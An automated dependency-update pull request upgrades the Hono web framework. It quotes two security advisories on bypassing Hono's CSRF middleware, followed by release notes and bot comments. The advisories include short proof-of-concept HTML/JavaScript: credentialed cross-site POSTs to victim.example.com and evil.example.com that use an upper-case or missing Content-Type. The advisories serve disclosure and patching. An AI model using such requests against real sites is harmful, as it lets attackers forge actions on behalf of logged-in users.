fix(deps): update dependency hono to v4.6.5 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
hono (source)	4.3.2 -> 4.6.5

---

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2024-43787

Summary

Hono CSRF middleware can be bypassed using crafted Content-Type header.

Details

MIME types are case insensitive, but isRequestedByFormElementRe only matches lower-case.

https://github.com/honojs/hono/blob/b0af71fbcc6dbe44140ea76f16d68dfdb32a99a0/src/middleware/csrf/index.ts#L16-L17

As a result, attacker can bypass csrf middleware using upper-case form-like MIME type, such as "Application/x-www-form-urlencoded".

PoC

<html>
  <head>
    <title>CSRF Test</title>
    <script defer>
      document.addEventListener("DOMContentLoaded", () => {
        document.getElementById("btn").addEventListener("click", async () => {
          const res = await fetch("http://victim.example.com/test", {
            method: "POST",
            credentials: "include",
            headers: {
              "Content-Type": "Application/x-www-form-urlencoded",
            },
          });
        });
      });
    </script>
  </head>
  <body>
    <h1>CSRF Test</h1>
    <button id="btn">Click me!</button>
  </body>
</html>

Impact

Bypass csrf protection implemented with hono csrf middleware.

Discussion

I'm not sure that omitting csrf checks for Simple POST request is a good idea.
CSRF prevention and CORS are different concepts even though CORS can prevent CSRF in some cases.

CVE-2024-48913

Summary

Bypass CSRF Middleware by a request without Content-Type herader.

Details

Although the csrf middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe.

https://github.com/honojs/hono/blob/cebf4e87f3984a6a034e60a43f542b4c5225b668/src/middleware/csrf/index.ts#L76-L89

PoC

// server.js
import { Hono } from 'hono'
import { csrf }from 'hono/csrf'
const app = new Hono()
app.use(csrf())
app.get('/', (c) => {
  return c.html('Hello Hono!')
})
app.post('/', async (c) => {
  console.log("executed")
  return c.text( await c.req.text())
})
Deno.serve(app.fetch)

<!-- PoC.html -->
<script>
async function myclick() {
    await fetch("http://evil.example.com", {
    method: "POST",
    credentials: "include",
    body:new Blob([`test`],{}),
    });
}
</script>
<input type="button" onclick="myclick()" value="run" />

Similarly, the fetch API does not add a Content-Type header for requests that do not include a Body.

await fetch("http://localhost:8000", { method: "POST", credentials: "include"});

Impact

Bypass csrf protection implemented with hono csrf middleware.

---

Release Notes

honojs/hono (hono)

v4.6.5

Compare Source

Security fix for CSRF Protection Middleware

This release includes a security fix for CSRF Protection Middleware. If you are using CSRF Protection Middleware, please upgrade this hono package immediately.

Before this release, a request without a Content-Type header can bypass the protection. This fix does not allow it. See: GHSA-2234-fmw7-43wr

What's Changed

• perf(types): replace intersection with union to get better perf by @​m-shaka in https://github.com/honojs/hono/pull/3443
• ci: use Deno v2 by @​yusukebe in https://github.com/honojs/hono/pull/3506
• ci: use Deno v2 for a test running for deno by @​nakasyou in https://github.com/honojs/hono/pull/3509
• fix(types): rm ExcludeEmptyObject to fix massively increased type instantiations by @​m-shaka in https://github.com/honojs/hono/pull/3507
• fix(cors): avoid setting Access-Control-Allow-Origin if there is no matching origin by @​uki00a in https://github.com/honojs/hono/pull/3510
• feat(powered-by): optional server name by @​PatrickJS in https://github.com/honojs/hono/pull/3492
• fix(factory): revert PR #​3498 by @​yusukebe in https://github.com/honojs/hono/pull/3515
• fix(build): remove private fields by @​nakasyou in https://github.com/honojs/hono/pull/3514

New Contributors

• @​uki00a made their first contribution in https://github.com/honojs/hono/pull/3510
• @​PatrickJS made their first contribution in https://github.com/honojs/hono/pull/3492

Full Changelog: honojs/hono@v4.6.4...v4.6.5

v4.6.4

Compare Source

What's Changed

• chore: upgrade dependencies by @​yusukebe in https://github.com/honojs/hono/pull/3446
• chore: remove crypto-js from dev dependencies by @​yusukebe in https://github.com/honojs/hono/pull/3447
• chore(test): suppress no-unused-vars "'x' is assigned a value but only used as type" by @​exoego in https://github.com/honojs/hono/pull/3451
• chore(test): include bun coverage by @​exoego in https://github.com/honojs/hono/pull/3457
• test(deno): remove duplicated app.get by @​exoego in https://github.com/honojs/hono/pull/3469
• fix(types): add key to IntrinsicAttributes by @​codehz in https://github.com/honojs/hono/pull/3474
• fix(factory): relax Bindings and Variables for createMiddleware by @​yusukebe in https://github.com/honojs/hono/pull/3498
• fix(service-worker): bind fetch to globalThis by @​sapphi-red in https://github.com/honojs/hono/pull/3500
• refactor(jsx): add override to toStringToBuffer in classes extending JSXNode by @​yusukebe in https://github.com/honojs/hono/pull/3505

New Contributors

• @​sapphi-red made their first contribution in https://github.com/honojs/hono/pull/3500

Full Changelog: honojs/hono@v4.6.3...v4.6.4

v4.6.3

Compare Source

This release has many new features, but each feature is small, so we've released it as a patch release.

What's Changed

• chore: rename runtime_tests to runtime-tests by @​yusukebe in https://github.com/honojs/hono/pull/3419
• ci: Type check perf by @​m-shaka in https://github.com/honojs/hono/pull/3406
• refactor(jsx/streaming): Clarified the type of renderToReadableStream. by @​usualoma in https://github.com/honojs/hono/pull/3434
• perf(types): use homomorphic mapped type to reduce conditional branches by @​m-shaka in https://github.com/honojs/hono/pull/3440
• ci: prettify type check result and rm a comment by @​m-shaka in https://github.com/honojs/hono/pull/3442
• fix(types): useSyncExternalStore type by @​codehz in https://github.com/honojs/hono/pull/3437
• fix(combine/every): make every middleware work with short-circuiting middlewares by @​paolostyle in https://github.com/honojs/hono/pull/3441
• feat(secureHeader): add CSP Report-Only mode support by @​isoppp in https://github.com/honojs/hono/pull/3413
• feat(jwt): make JwtVariables generic for improved type safety by @​TinsFox in https://github.com/honojs/hono/pull/3428
• feat(request): Make request.ts available throught JSR for frameworks that need to instantiate HonoRequest by @​Sorikairox in https://github.com/honojs/hono/pull/3425
• feat(jsx/precompile): Normalization and stringification of attribute values as renderToString by @​usualoma in https://github.com/honojs/hono/pull/3432
• feat(serve-static): support absolute root by @​yusukebe in https://github.com/honojs/hono/pull/3420

New Contributors

• @​codehz made their first contribution in https://github.com/honojs/hono/pull/3437
• @​paolostyle made their first contribution in https://github.com/honojs/hono/pull/3441
• @​isoppp made their first contribution in https://github.com/honojs/hono/pull/3413
• @​TinsFox made their first contribution in https://github.com/honojs/hono/pull/3428
• @​Sorikairox made their first contribution in https://github.com/honojs/hono/pull/3425

Full Changelog: honojs/hono@v4.6.2...v4.6.3

v4.6.2

Compare Source

What's Changed

• chore(lint): ESLint v9 by @​yusukebe in https://github.com/honojs/hono/pull/3393
• perf(serve-static): performance optimization for precompressed feature by @​usualoma in https://github.com/honojs/hono/pull/3414
• fix(serve-static): use application/octet-stream if the mime type is not detected by @​usualoma in https://github.com/honojs/hono/pull/3415

Full Changelog: honojs/hono@v4.6.1...v4.6.2

v4.6.1

Compare Source

What's Changed

• fix(build): improve addExtension esbuild plugin by @​kt3k in https://github.com/honojs/hono/pull/3405

New Contributors

• @​kt3k made their first contribution in https://github.com/honojs/hono/pull/3405

Full Changelog: honojs/hono@v4.6.0...v4.6.1

v4.6.0

Compare Source

Hono v4.6.0 is now available!

One of the highlights of this release is the Context Storage Middleware. Let's introduce it.

Context Storage Middleware

Many users may have been waiting for this feature. The Context Storage Middleware uses AsyncLocalStorage to allow handling of the current Context object even outside of handlers.

For example, let’s define a Hono app with a variable message: string.

type Env = {
  Variables: {
    message: string
  }
}

const app = new Hono<Env>()

To enable Context Storage Middleware, register contextStorage() as middleware at the top and set the message value.

import { contextStorage } from 'hono/context-storage'

//...

app.use(contextStorage())

app.use(async (c, next) => {
  c.set('message', 'Hello!')
  await next()
})

getContext() returns the current Context object, allowing you to get the value of the message variable outside the handler.

import { getContext } from 'hono/context-storage'

app.get('/', (c) => {
  return c.text(getMessage())
})

// Access the variable outside the handler.
const getMessage = () => {
  return getContext<Env>().var.message
}

In the case of Cloudflare Workers, you can also access the Bindings outside the handler by using this middleware.

type Env = {
  Bindings: {
    KV: KVNamespace
  }
}

const app = new Hono<Env>()

app.use(contextStorage())

const setKV = (value: string) => {
  return getContext<Env>().env.KV.put('key', value)
}

Thanks @​marceloverdijk !

New features

• feat(secureHeader): add Permissions-Policy header to secure headers middleware https://github.com/honojs/hono/pull/3314
• feat(cloudflare-pages): enable c.env.eventContext in handleMiddleware https://github.com/honojs/hono/pull/3332
• feat(websocket): Add generics type to WSContext https://github.com/honojs/hono/pull/3337
• feat(jsx-renderer): set Content-Encoding when stream is true https://github.com/honojs/hono/pull/3355
• feat(serveStatic): add precompressed option https://github.com/honojs/hono/pull/3366
• feat(helper/streaming): Support Promise<string> or (async) JSX.Element in streamSSE https://github.com/honojs/hono/pull/3344
• feat(context): make fetch Response headers mutable https://github.com/honojs/hono/pull/3318
• feat(serve-static): add onFound option https://github.com/honojs/hono/pull/3396
• feat(basic-auth): added custom response message option https://github.com/honojs/hono/pull/3371
• feat(bearer-auth): added custom response message options https://github.com/honojs/hono/pull/3372

Other changes

• chore(jsx-renderer): fix typo in JSDoc by @​taga3s in https://github.com/honojs/hono/pull/3378
• chore(deno): use the latest jsr libraries for testing by @​ryuapp in https://github.com/honojs/hono/pull/3375
• fix(secure-headers): optimize getPermissionsPolicyDirectives function by @​kbkn3 in https://github.com/honojs/hono/pull/3398
• fix(bearer-auth): typo by @​yusukebe in https://github.com/honojs/hono/pull/3404

New Contributors

• @​kbkn3 made their first contribution in https://github.com/honojs/hono/pull/3314
• @​hayatosc made their first contribution in https://github.com/honojs/hono/pull/3337
• @​inetol made their first contribution in https://github.com/honojs/hono/pull/3366

Full Changelog: honojs/hono@v4.5.11...v4.6.0

v4.5.11

Compare Source

What's Changed

• fix(jsx): race condition in ErrorBoundary with event loop by @​usualoma in https://github.com/honojs/hono/pull/3343
• perf(jsx): skip the special behavior when the element is in the head. by @​usualoma in https://github.com/honojs/hono/pull/3352
• refactor(utils/body): shorten the code by @​yusukebe in https://github.com/honojs/hono/pull/3353
• docs: Twitter to X by @​yusukebe in https://github.com/honojs/hono/pull/3354
• chore: fix typo in JSDoc by @​taga3s in https://github.com/honojs/hono/pull/3364
• refactor(utils/basic-auth): Moved Internal function to utils by @​sugar-cat7 in https://github.com/honojs/hono/pull/3359

New Contributors

• @​taga3s made their first contribution in https://github.com/honojs/hono/pull/3364
• @​sugar-cat7 made their first contribution in https://github.com/honojs/hono/pull/3359

Full Changelog: honojs/hono@v4.5.10...v4.5.11

v4.5.10

Compare Source

What's Changed

• feat(compress): improve compress middleware by @​nitedani in https://github.com/honojs/hono/pull/3317
• feat(jsx): add popover api attributes by @​ssssota in https://github.com/honojs/hono/pull/3323
• feat(jsx): improve form attribute types by @​ssssota in https://github.com/honojs/hono/pull/3330
• chore(test): migrate to vitest v2 by @​yasuaki640 in https://github.com/honojs/hono/pull/3326
• chore(test): replace deprecated vitest type by @​yasuaki640 in https://github.com/honojs/hono/pull/3338
• fix(logger): removing spaces from logger by @​marceloverdijk in https://github.com/honojs/hono/pull/3334

New Contributors

• @​nitedani made their first contribution in https://github.com/honojs/hono/pull/3317
• @​marceloverdijk made their first contribution in https://github.com/honojs/hono/pull/3334

Full Changelog: honojs/hono@v4.5.9...v4.5.10

v4.5.9

Compare Source

What's Changed

• test(types): broken test in future versions of typescript by @​m-shaka in https://github.com/honojs/hono/pull/3310
• fix(utils/color): Deno does not require permission for NO_COLOR by @​ryuapp in https://github.com/honojs/hono/pull/3306
• feat(jsx): improve type (MIME) attribute types by @​ssssota in https://github.com/honojs/hono/pull/3305
• feat(pretty-json): support custom query by @​nakasyou in https://github.com/honojs/hono/pull/3300

Full Changelog: honojs/hono@v4.5.8...v4.5.9

v4.5.8

Compare Source

Security Fix for CSRF Protection Middleware

Before this release, in versions 4.5.7 and below, the CSRF Protection Middleware did not treat requests including Content-Types with uppercase letters (e.g., Application/x-www-form-urlencoded) as potential attacks, allowing them to pass.

This could cause unexpected behavior, leading to a vulnerability. If you are using the CSRF Protection Middleware, please upgrade to version 4.5.8 or higher immediately.

For more details, see the report here: GHSA-rpfr-3m35-5vx5

v4.5.7

Compare Source

What's Changed

• fix(jsx/dom): Fixed a bug that caused Script elements to turn into Style elements. by @​usualoma in https://github.com/honojs/hono/pull/3294
• perf(jsx/dom): improve performance by @​usualoma in https://github.com/honojs/hono/pull/3288
• feat(jsx): improve a-tag types with well known values by @​ssssota in https://github.com/honojs/hono/pull/3287
• fix(validator): Fixed a bug in hono/validator where URL Encoded Data could not be validated if the Content-Type included charset. by @​uttk in https://github.com/honojs/hono/pull/3297
• feat(jsx): improve target and formtarget attribute types by @​ssssota in https://github.com/honojs/hono/pull/3299
• docs(README): change Twitter to X by @​nakasyou in https://github.com/honojs/hono/pull/3301
• fix(client): replace optional params to url correctly by @​yusukebe in https://github.com/honojs/hono/pull/3304
• feat(jsx): improve input attribute types based on react by @​ssssota in https://github.com/honojs/hono/pull/3302

New Contributors

• @​uttk made their first contribution in https://github.com/honojs/hono/pull/3297

Full Changelog: honojs/hono@v4.5.6...v4.5.7

v4.5.6

Compare Source

What's Changed

• fix(jsx): handle async component error explicitly and throw the error in the response by @​usualoma in https://github.com/honojs/hono/pull/3274
• fix(validator): support multipart headers without a separating space by @​Ernxst in https://github.com/honojs/hono/pull/3286
• fix(validator): Allow form data will mutliple values appended by @​nicksrandall in https://github.com/honojs/hono/pull/3273
• feat(jsx): improve meta-tag types with well known values by @​ssssota in https://github.com/honojs/hono/pull/3276

New Contributors

• @​Ernxst made their first contribution in https://github.com/honojs/hono/pull/3286
• @​ssssota made their first contribution in https://github.com/honojs/hono/pull/3276

Full Changelog: honojs/hono@v4.5.5...v4.5.6

v4.5.5

Compare Source

What's Changed

• fix(jsx): allow null, undefined, and boolean to be returned from function component by @​usualoma in https://github.com/honojs/hono/pull/3241
• feat(context): Add types for c.header by @​nakasyou in https://github.com/honojs/hono/pull/3221
• fix(jsx): fix draggable type to accept boolean by @​yasuaki640 in https://github.com/honojs/hono/pull/3253
• feat(context): add Context-Type types to c.header by @​nakasyou in https://github.com/honojs/hono/pull/3255
• fix(serve-static): supports directory contains . and not end / by @​yusukebe in https://github.com/honojs/hono/pull/3256

Full Changelog: honojs/hono@v4.5.4...v4.5.5

v4.5.4

Compare Source

What's Changed

• fix(jsx): corrects the type of 'draggable' attribute in intrinsic-elements.ts by @​yasuaki640 in https://github.com/honojs/hono/pull/3224
• feat(jsx): allow to merge CSSProperties declaration by @​jonasnobile in https://github.com/honojs/hono/pull/3228
• feat(client): Add WebSocket Provider Integration Tests and Enhance WebSocket Initialization by @​naporin0624 in https://github.com/honojs/hono/pull/3213
• fix(types): param in ValidationTargets supports optional param by @​yusukebe in https://github.com/honojs/hono/pull/3229

New Contributors

• @​jonasnobile made their first contribution in https://github.com/honojs/hono/pull/3228

Full Changelog: honojs/hono@v4.5.3...v4.5.4

v4.5.3

Compare Source

What's Changed

• fix(validator): Add double quotation marks to multipart checker regex by @​CPlusPatch in https://github.com/honojs/hono/pull/3195
• fix(validator): support application/json with a charset as JSON by @​yusukebe in https://github.com/honojs/hono/pull/3199
• fix(jsx): fix handling of SVG elements in JSX. by @​usualoma in https://github.com/honojs/hono/pull/3204
• fix(jsx/dom): fix performance issue with adding many new node listings by @​usualoma in https://github.com/honojs/hono/pull/3205
• fix(service-worker): refer to self.fetch correctly by @​yusukebe in https://github.com/honojs/hono/pull/3200

New Contributors

• @​CPlusPatch made their first contribution in https://github.com/honojs/hono/pull/3195

Full Changelog: honojs/hono@v4.5.2...v4.5.3

v4.5.2

Compare Source

What's Changed

• fix(helper/adapter): don't check navigator is undefined by @​yusukebe in https://github.com/honojs/hono/pull/3171
• fix(types): handle readonly array correctly by @​m-shaka in https://github.com/honojs/hono/pull/3172
• Revert "fix(helper/adapter): don't check navigator is undefined by @​yusukebe in https://github.com/honojs/hono/pull/3173
• fix(type): degradation of generic type handling by @​m-shaka in https://github.com/honojs/hono/pull/3138
• fix:(csrf) fix typo of csrf middleware by @​yasuaki640 in https://github.com/honojs/hono/pull/3178
• feat(secure-headers): remove "X-Powered-By" should be an option by @​EdamAme-x in https://github.com/honojs/hono/pull/3177

Full Changelog: honojs/hono@v4.5.1...v4.5.2

v4.5.1

Compare Source

What's Changed

• chore: remove rimraf and use bun shell by @​nakasyou in https://github.com/honojs/hono/pull/3146
• chore: moving the setup file of vitest by @​EdamAme-x in https://github.com/honojs/hono/pull/3157
• fix(middleware/jwt): Changed the jwt-secret type to SignatureKey by @​JulesVerner in https://github.com/honojs/hono/pull/3167
• feat(bearer-auth): Allow empty bearer-auth middleware prefixes by @​prevostc in https://github.com/honojs/hono/pull/3161
• chore(factory): remove @experimental from createApp by @​yusukebe in https://github.com/honojs/hono/pull/3164
• fix(client): support array values for query in ws by @​yusukebe in https://github.com/honojs/hono/pull/3169
• fix(validator): ignore content-type mismatches by @​yusukebe in https://github.com/honojs/hono/pull/3165

New Contributors

• @​JulesVerner made their first contribution in https://github.com/honojs/hono/pull/3167
• @​prevostc made their first contribution in https://github.com/honojs/hono/pull/3161

Full Changelog: honojs/hono@v4.5.0...v4.5.1

v4.5.0

Compare Source

v4.4.13

Compare Source

What's Changed

• chore: update benchmark by @​yusukebe in https://github.com/honojs/hono/pull/3102
• chore: replace tsx with Bun by @​nakasyou in https://github.com/honojs/hono/pull/3103
• refactor(http-status): remove unnecessary line of types and use common types by @​EdamAme-x in https://github.com/honojs/hono/pull/3110
• fix(jsx): redefine scope attribute as enum type by @​yasuaki640 in https://github.com/honojs/hono/pull/3118
• fix(types): allow string[] | File[] for RPC form value by @​yusukebe in https://github.com/honojs/hono/pull/3117
• fix(validator-types): type Alignment with Web Standards by @​EdamAme-x in https://github.com/honojs/hono/pull/3120
• fix(types): app.use(path, mw) return correct schema type by @​yusukebe in https://github.com/honojs/hono/pull/3128

Full Changelog: honojs/hono@v4.4.12...v4.4.13

v4.4.12

Compare Source

What's Changed

• fix(aws-lambda): set cookies with comma is bugged by @​NamesMT in https://github.com/honojs/hono/pull/3084
• fix(types): infer path when chaining after use by @​yusukebe in https://github.com/honojs/hono/pull/3087
• chore: update outdated links in JSDoc by @​ryuapp in https://github.com/honojs/hono/pull/3089
• fix(jsx): changes behavior when download attribute is set to a boolean value. by @​oon00b in https://github.com/honojs/hono/pull/3094
• chore: add the triage label by @​mvares in https://github.com/honojs/hono/pull/3092
• feat(types): improve JSONParsed by @​m-shaka in https://github.com/honojs/hono/pull/3074
• fix(helper/streaming): remove slow types by @​yusukebe in https://github.com/honojs/hono/pull/3100
• chore(utils/jwt): add @module docs by @​yusukebe in https://github.com/honojs/hono/pull/3101

New Contributors

• @​oon00b made their first contribution in https://github.com/honojs/hono/pull/3094

Full Changelog: honojs/hono@v4.4.11...v4.4.12

v4.4.11

Compare Source

What's Changed

• refactor: remove unnecessary async keyword from router tests by @​K-tecchan in https://github.com/honojs/hono/pull/3061
• fix(validator): don't return a FormData if formData is cached by @​yusukebe in https://github.com/honojs/hono/pull/3067
• fix(client): Add Query Parameter Support to WebSocket Client in hono/client by @​naporin0624 in https://github.com/honojs/hono/pull/3066
• refactor(types): move HandlerInterface's (path, handler)s overloads down by @​NamesMT in https://github.com/honojs/hono/pull/3072
• test(helper/dev): fix typo of test case name by @​yasuaki640 in https://github.com/honojs/hono/pull/3073
• fix(stream): Fixed a problem that onAbort() is called even if request is normally closed in deno by @​usualoma in https://github.com/honojs/hono/pull/3079

New Contributors

• @​K-tecchan made their first contribution in https://github.com/honojs/hono/pull/3061

Full Changelog: honojs/hono@v4.4.10...v4.4.11

v4.4.10

Compare Source

What's Changed

• chore(jsr): export JWT utils by @​ryuapp in https://github.com/honojs/hono/pull/3056
• fix(streaming): call stream.abort() explicitly when request is aborted by @​usualoma in https://github.com/honojs/hono/pull/3042
• fix(client): set Path as the default of Original by @​m-shaka in https://github.com/honojs/hono/pull/3058

New Contributors

• @​m-shaka made their first contribution in https://github.com/honojs/hono/pull/3058

Full Changelog: honojs/hono@v4.4.9...v4.4.10

v4.4.9

Compare Source

What's Changed

• perf(context): improve initializing Context by @​yusukebe in https://github.com/honojs/hono/pull/3046
• fix(types): correct inferring env when routes channing by @​yusukebe in https://github.com/honojs/hono/pull/3051
• docs: update the description of package.json and README by @​yusukebe in https://github.com/honojs/hono/pull/3052
• fix(timing): prevent duplicate applications by @​yusukebe in https://github.com/honojs/hono/pull/3054

Full Changelog: honojs/hono@v4.4.8...v4.4.9

v4.4.8

Compare Source

What's Changed

• fix(jsx): add an explicit type by @​yusukebe in https://github.com/honojs/hono/pull/3007
• ci: use env for codecov GitHub Actions by @​yusukebe in https://github.com/honojs/hono/pull/3010
• chore: Fix typos in JSDoc by @​NicoPlyley in https://github.com/honojs/hono/pull/3002
• fix: change to allow use of websocket options by @​EdamAme-x in https://github.com/honojs/hono/pull/2999
• perf: parseAccept without spread operator by @​Jayllyz in https://github.com/honojs/hono/pull/3003
• test: add tests for buffer.ts by @​yasuaki640 in https://github.com/honojs/hono/pull/3004
• chore: upload bun test coverage to CodeCov by @​exoego in https://github.com/honojs/hono/pull/3022
• refactor: remove unneeded import statements by @​EdamAme-x in https://github.com/honojs/hono/pull/3014
• perf(utils/buffer): use promise all for better performance by @​yasuaki640 in https://github.com/honojs/hono/pull/3031

Full Changelog: honojs/hono@v4.4.7...v4.4.8

v4.4.7

Compare Source

What's Changed

• use correct return type for c.html depending on input by @​asmadsen in https://github.com/honojs/hono/pull/2973
• test: test uncovered return statement by @​yasuaki640 in https://github.com/honojs/hono/pull/2985
• test: Update request.test.ts to remove duplicate checks by @​JoaquimLey in https://github.com/honojs/hono/pull/2984
• fix(types): env variables override ContextVariableMap by @​KaelWD in https://github.com/honojs/hono/pull/2987

New Contributors

• @​asmadsen made their first contribution in https://github.com/honojs/hono/pull/2973
• @​JoaquimLey made their first contribution in https://github.com/honojs/hono/pull/2984
• @​KaelWD made their first contribution in https://github.com/honojs/hono/pull/2987

Full Changelog: honojs/hono@v4.4.6...v4.4.7

v4.4.6

Compare Source

What's Changed

• fix(aws-lambda): handle multiple cookies in streaming responses by @​KnisterPeter in https://github.com/honojs/hono/pull/2926

Full Changelog: honojs/hono@v4.4.5...v4.4.6

v4.4.5

Compare Source

What's Changed

• fix(cors): allow custom vary header by @​fzn0x in https://github.com/honojs/hono/pull/2934
• fix(jsx): rename Hono to JSX and export JSX namespace by @​yusukebe in https://github.com/honojs/hono/pull/2937
• refactor(hono-base): make 2nd arg of app.route() required by @​yusukebe in https://github.com/honojs/hono/pull/2945
• refactor(hono-base): don't check 1st argument of app.on() by @​yusukebe in https://github.com/honojs/hono/pull/2946
• refactor(context): remove unnecessary initialization add add tests for Context by @​yusukebe in https://github.com/honojs/hono/pull/2949
• test(hono-base): add tests for covering 100% by @​yusukebe in https://github.com/honojs/hono/pull/2952
• fix(context): default JSONRespond and TextRespond StatusCode generic arg by @​EdamAme-x in https://github.com/honojs/hono/pull/2954
• refactor(request): shorten parseBody and remove unnecessary check by @​yusukebe in https://github.com/honojs/hono/pull/2947
• refactor(jsx): reduce code size and improve maintainability by @​usualoma in https://github.com/honojs/hono/pull/2956

Full Changelog: honojs/hono@v4.4.4...v4.4.5

v4.4.4

Compare Source

What's Changed

• fix(typo): Fix typo in request.test.ts by @​yasuaki640 in https://github.com/honojs/hono/pull/2899
• feat(hono-base): skip import HTTPException by using HTTPResponseError by @​usualoma in https://github.com/honojs/hono/pull/2898
• chore: improve unfinalized response error by @​Cherry in https://github.com/honojs/hono/pull/2902
• chore: create .gitpod.yml by @​EdamAme-x in https://github.com/honojs/hono/pull/2868
• fix(cloudflare-workers): export getConnInfo() by @​ryuapp in https://github.com/honojs/hono/pull/2906
• fix(hono-base): return 404 if lacking response in a single sync handler by @​yusukebe in https://github.com/honojs/hono/pull/2909
• refactor: remove Prettify as duplicated with Simplify by @​NamesMT in https://github.com/honojs/hono/pull/2914
• fix(types): #​2912: interfaces array's respond typed as never by @​NamesMT in https://github.com/honojs/hono/pull/2915
• feat(context): c.redirect() supports TypedResponse by @​yusukebe in https://github.com/honojs/hono/pull/2908
• feat(jsx): support htmlfor attribute alias by @​akira-tsuno in https://github.com/honojs/hono/pull/2916
• fix(filepath): allow suffix includes - and _ by @​yusukebe in https://github.com/honojs/hono/pull/2910
• fix(types): add _ prefix to TypedResponse properties by @​yusukebe in https://github.com/honojs/hono/pull/2917
• fix(types): SimplifyDeepArray should now actually be "deep" by @​NamesMT in https://github.com/honojs/hono/pull/2920
• refactor(middleware/serve-static): call getContent only once if the file does not exist by @​usualoma in https://github.com/honojs/hono/pull/2922
• chore: add text and html for coverage reporter by @​yusukebe in https://github.com/honojs/hono/pull/2923
• refactor(conninfo): create types.ts for type definitions by @​yusukebe in https://github.com/honojs/hono/pull/2924

New Contributors

• @​yasuaki640 made their first contribution in https://github.com/honojs/hono/pull/2899
• @​Cherry made their first contribution in https://github.com/honojs/hono/pull/2902
• @​akira-tsuno made their first contribution in https://github.com/honojs/hono/pull/2916

Full Changelog: honojs/hono@v4.4.3...v4.4.4

v4.4.3

Compare Source

What's Changed

• ci: Update workflow name of release.yml by @​siguici in https://github.com/honojs/hono/pull/2874
• refactor: removed unnecessary line by @​EdamAme-x in https://github.com/honojs/hono/pull/2869
• ci: change name of workflow jobs by @​EdamAme-x in https://github.com/honojs/hono/pull/2875
• docs(jsdoc): add jsdoc of some modules by @​EdamAme-x in https://github.com/honojs/hono/pull/2836
• ci: Report coverage with CodeCov by @​exoego in https://github.com/honojs/hono/pull/2862
• docs: update readme and migrate guide for migrating deno.land/x to JSR by @​yusukebe in https://github.com/honojs/hono/pull/2879
• chore: add coverage badge to README by @​exoego in https://github.com/honojs/hono/pull/2881
• fix(websocket): the onopen event cannot be triggered during delayed operations in deno by @​JetLua in https://github.com/honojs/hono/pull/2864
• fix(cloudflare-workers): Update websocket.ts to return 101 status code by @​ronkeiser in https://github.com/honojs/hono/pull/2886
• test(workerd): rename the runtime test wrangler to workerd by @​yusukebe in https://github.com/honojs/hono/pull/2888
• test(workerd): add tests for WebSocket by @​yusukebe in https://github.com/honojs/hono/pull/2891
• refactor(aws-lambda): merge custom-context into types by @​exoego in https://github.com/honojs/hono/pull/2889
• chore: Exclude type-only files from coverage by @​exoego in https://github.com/honojs/hono/pull/2890
• test(presets): add tests for hono/quick and hono/tiny by @​yusukebe in https://github.com/honojs/hono/pull/2892
• fix(types): fix typo for unofficial status code type by @​ryuapp i

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: yarn.lock

error This project's package.json defines "packageManager": "yarn@[email protected]". However the current global version of Yarn is 1.22.22.

Presence of the "packageManager" field indicates that the project is meant to be used with Corepack, a tool included by default with all official Node.js distributions starting from 16.9 and 14.19.
Corepack must currently be enabled by running corepack enable in your terminal. For more information, check out https://yarnpkg.com/corepack.

[vercel]

The latest updates on your projects. Learn more about Vercel for Git ↗︎

3 Skipped Deployments

Name	Status	Preview	Comments	Updated (UTC)
saku-apps-blog	⬜️ Ignored (Inspect)	Visit Preview		Jan 26, 2025 2:24pm
blog.sakupi01.com	⬜️ Skipped (Inspect)			Jan 26, 2025 2:24pm
git-kusa	⬜️ Skipped (Inspect)			Jan 26, 2025 2:24pm

[codspeed-hq]

CodSpeed Performance Report

Merging #104 will not alter performance

_{Comparing renovate/npm-hono-vulnerability (bd1cb9b) with main (1179fae)}

Summary

✅ 3 untouched benchmarks